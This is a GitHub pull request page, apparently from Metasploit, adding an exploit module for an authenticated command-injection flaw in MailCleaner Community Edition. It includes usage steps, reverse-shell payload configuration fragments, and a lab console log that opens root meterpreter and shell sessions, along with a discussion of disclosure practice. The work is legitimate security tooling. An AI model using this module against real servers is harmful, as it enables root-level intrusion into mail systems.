New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We鈥檒l occasionally send you account related emails.

Already on GitHub? Sign in to your account

Adding Module MailCleaner Remote Code Execution Module #11148

Merged
merged 9 commits into from Jan 8, 2019

Conversation

Projects
None yet
8 participants
@mmetince
Copy link
Contributor

mmetince commented Dec 19, 2018

Hi fellas 馃帀

This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an operating system command under the context of the web server user which is root.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use use exploit/linux/http/mailcleaner
  • Set RHOST
  • Set LHOST
  • Set USERNAME
  • Set PASSWORD
  • Run exploit
  • Verify that you are seeing Awesome..! Authenticated.
  • Verify that you are getting meterpreter session.

Technical Details and MSF Module in Asciinema
https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Dec 19, 2018

Hi, @mmetince! Welcome back. :P

@wvu-r7 wvu-r7 added the feature label Dec 19, 2018

@jmartin-r7

This comment has been minimized.

Copy link
Contributor

jmartin-r7 commented Dec 19, 2018

Looks like latest update made msftidy sad. Only the warning about newline is required.

[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/linux/http/mailcleaner_exec.rb - [INFO] No CVE references found. Please check before you land!
modules/exploits/linux/http/mailcleaner_exec.rb - [WARNING] Please add a newline at the end of the file
------------------------------------------------------------------------
------------------------------------------------------------------------
[*] This merge contains modules failing msftidy.rb
[*] Please fix this if you intend to publish these
[*] modules to a popular metasploit-framework repo
------------------------------------------------------------------------
@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Dec 20, 2018

@mmetince: It sounds like you're in @jrobles-r7's very capable hands now. Thanks!

@todb-r7

This comment has been minimized.

Copy link
Contributor

todb-r7 commented Dec 20, 2018

Hi @mmetince -- I'm assuming there hasn't been any coordinated vuln disclosure (CVD) on this, so I'm going to clue the vendor in and see about securing a CVE from DWF at https://iwantacve.org/ (since it's open source software), using this PR as a reference. Cool with you, I assume?

In the future, if you'd like to play along with CVD and maybe /not/ drop 0day on unsuspecting users, I would be happy to help disclose this stuff on your behalf per Rapid7's disclosure policy. Your bug, your choice, of course, but limiting surprises like this is usually more neighborly. :)

@mmetince

This comment has been minimized.

Copy link
Contributor Author

mmetince commented Dec 20, 2018

Hi @todb-r7, it's cool ofc.

I fully understand what you are saying. I would like to share my thoughts regarding the 0day disclosure case like this one.

Every single one of my research is like; focus on technical details, find 0day, prepare write-up and msf modules and then report it to the vendor. When the vulnerability requires an authentication and vendor didn't rapidly response, I go with full disclosure because I don't want to go back to the project after couple of weeks/months. It's like waste of time when you try to remember all the technical stuff that you've done before (product installation steps etc etc, msf landing process which requires lots of changes, thanks to pple @wvu-r7 馃檹).

Cheers,

Show resolved Hide resolved documentation/modules/exploit/linux/http/mailcleaner_exec.md Outdated
Show resolved Hide resolved documentation/modules/exploit/linux/http/mailcleaner_exec.md Outdated
{
'SSL' => true,
'WfsDelay' => 5,
'Payload' => 'python/meterpreter/reverse_tcp'

This comment has been minimized.

@jrobles-r7

jrobles-r7 Dec 21, 2018

Contributor

Move to the target with python

Suggested change Beta
'Payload' => 'python/meterpreter/reverse_tcp'
'WfsDelay' => 5,
'Payload' => 'python/meterpreter/reverse_tcp'
},
'Platform' => ['unix'],

This comment has been minimized.

@jrobles-r7

jrobles-r7 Dec 21, 2018

Contributor

Each target specifies its platform. This can be removed.

Suggested change Beta
'Platform' => ['unix'],

This comment has been minimized.

@wvu-r7

wvu-r7 Dec 21, 2018

Contributor

I would add all the platforms to the top-level Platform. Same for Arch. Otherwise they won't display in info. Someone can fix that if they want.

This comment has been minimized.

@wvu-r7

wvu-r7 Dec 21, 2018

Contributor
msf5 exploit(linux/http/mailcleaner_exec) > git diff
[*] exec: git diff

diff --git a/modules/exploits/linux/http/mailcleaner_exec.rb b/modules/exploits/linux/http/mailcleaner_exec.rb
index 361cbeab8a..cf92c85b10 100644
--- a/modules/exploits/linux/http/mailcleaner_exec.rb
+++ b/modules/exploits/linux/http/mailcleaner_exec.rb
@@ -33,8 +33,8 @@ class MetasploitModule < Msf::Exploit::Remote
           'WfsDelay' => 5,
           'Payload'  => 'python/meterpreter/reverse_tcp'
         },
-      'Platform'       => ['unix'],
-      'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
+      #'Platform'       => ['unix'],
+      #'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
       'Targets'        =>
         [
           [
msf5 exploit(linux/http/mailcleaner_exec) > info
[snip]
   Platform:
       Arch:
[snip]
msf5 exploit(linux/http/mailcleaner_exec) >

This comment has been minimized.

@mmetince

mmetince Dec 22, 2018

Author Contributor

It is okay to leave 'targets' section as it and add all the platforms to the top-level platforms like something as follow ?

      'Platform'       => ['python', 'unix'],
      'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
      'Targets'        =>
        [
          [
            'Python payload',
            {
              'Platform' => 'python',
              'Arch' => ARCH_PYTHON,
            }
          ],
          [
            'Command payload',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Payload' =>
              {
                'BadChars' => "\x26",
              }
            }
          ]
        ],
Show resolved Hide resolved modules/exploits/linux/http/mailcleaner_exec.rb

jrobles-r7 and others added some commits Dec 22, 2018

Update documentation/modules/exploit/linux/http/mailcleaner_exec.md
Co-Authored-By: mmetince <mmetince@users.noreply.github.com>
Update documentation/modules/exploit/linux/http/mailcleaner_exec.md
Co-Authored-By: mmetince <mmetince@users.noreply.github.com>
@mmetince

This comment has been minimized.

Copy link
Contributor Author

mmetince commented Jan 3, 2019

ping

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Jan 4, 2019

pong!

I believe Jacob is actively working on this PR, so no worries, this will be landed :-)

jrobles-r7 added some commits Jan 8, 2019

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Jan 8, 2019

Tested on MailCleaner Community Edition

msf5 > use exploit/linux/http/mailcleaner_exec
msf5 exploit(linux/http/mailcleaner_exec) > set username admin
username => admin
msf5 exploit(linux/http/mailcleaner_exec) > set password MCPassw0rd
password => MCPassw0rd
msf5 exploit(linux/http/mailcleaner_exec) > set rhosts 172.22.222.132
rhosts => 172.22.222.132
msf5 exploit(linux/http/mailcleaner_exec) > set lhost 172.22.222.136 
lhost => 172.22.222.136
msf5 exploit(linux/http/mailcleaner_exec) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:MCPassw0rd
[*] Exploiting command injection flaw
[*] Sending stage (53508 bytes) to 172.22.222.132
[*] Meterpreter session 2 opened (172.22.222.136:4444 -> 172.22.222.132:49783) at 2019-01-08 13:01:38 -0600

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : mailcleaner
OS              : Linux 3.16.0-4-amd64 #1 SMP Debian 3.16.51-3 (2017-12-13)
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.132 - Meterpreter session 2 closed.  Reason: User exit
msf5 exploit(linux/http/mailcleaner_exec) > set target 1
target => 1
msf5 exploit(linux/http/mailcleaner_exec) > set lhost 172.22.222.136 
lhost => 172.22.222.136
msf5 exploit(linux/http/mailcleaner_exec) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Performing authentication...
[+] Awesome..! Authenticated with admin:MCPassw0rd
[*] Exploiting command injection flaw
[*] Command shell session 3 opened (172.22.222.136:4444 -> 172.22.222.132:49789) at 2019-01-08 13:02:00 -0600

whoami
root
uname -a      
Linux mailcleaner 3.16.0-4-amd64 #1 SMP Debian 3.16.51-3 (2017-12-13) x86_64 GNU/Linux
^C
Abort session 3? [y/N]  y

@jrobles-r7 jrobles-r7 merged commit a0acfa7 into rapid7:master Jan 8, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

jrobles-r7 added a commit that referenced this pull request Jan 8, 2019

msjenkins-r7 added a commit that referenced this pull request Jan 8, 2019

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Jan 8, 2019

Release Notes

The mailcleaner_exec exploit module has been added to the framework. This exploits an authenticated command injection vulnerability in the MailCleaner Community Edition product.

todb-r7 added a commit to todb-r7/metasploit-framework that referenced this pull request Jan 23, 2019

Add CVE-2018-1000999 to MailCleaner module
See PR rapid7#11148

This adds the new CVE assigned by DWF for this vulnerability.

Note that [CVE-2018-10933](https://www.cvedetails.com/cve/CVE-2018-10933/)
describes a vulnerability in libssh, but this one describes the issue as
it pertains to MailCleaner specifically.

@todb-r7 todb-r7 referenced this pull request Jan 23, 2019

Merged

Add CVE-2018-1000999 to MailCleaner module #11304

3 of 3 tasks complete
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment